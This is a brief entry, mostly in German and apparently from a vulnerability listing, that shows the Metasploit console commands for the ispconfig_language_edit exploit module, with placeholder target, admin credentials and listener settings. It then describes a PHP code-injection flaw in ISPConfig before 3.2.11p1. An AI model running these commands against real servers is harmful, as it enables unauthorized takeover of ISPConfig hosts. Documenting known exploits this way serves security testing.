
Metasploit-Module
Metasploit-Modul

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
Ein Problem wurde in ISPConfig vor Version 3.2.11p1 entdeckt. PHP-Code-Injection kann im Sprachdatei-Editor von einem Admin erreicht werden, wenn admin_allow_langedit aktiviert ist.